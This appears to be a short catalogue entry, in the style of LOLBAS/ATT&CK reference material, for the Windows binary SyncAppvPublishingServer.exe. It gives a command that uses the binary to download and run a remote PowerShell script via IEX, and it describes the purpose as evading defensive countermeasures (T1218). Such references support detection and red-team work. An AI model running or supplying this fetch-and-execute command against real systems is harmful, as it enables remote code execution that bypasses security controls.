Example command on how inject Powershell code into the process
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"
- Use case
- Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures
- Privileges required
- User
- Operating systems
- Windows 10 1709, Windows 10 1703, Windows 10 1607
- ATT&CK® technique
- T1218
- Tags
Execute: PowerShell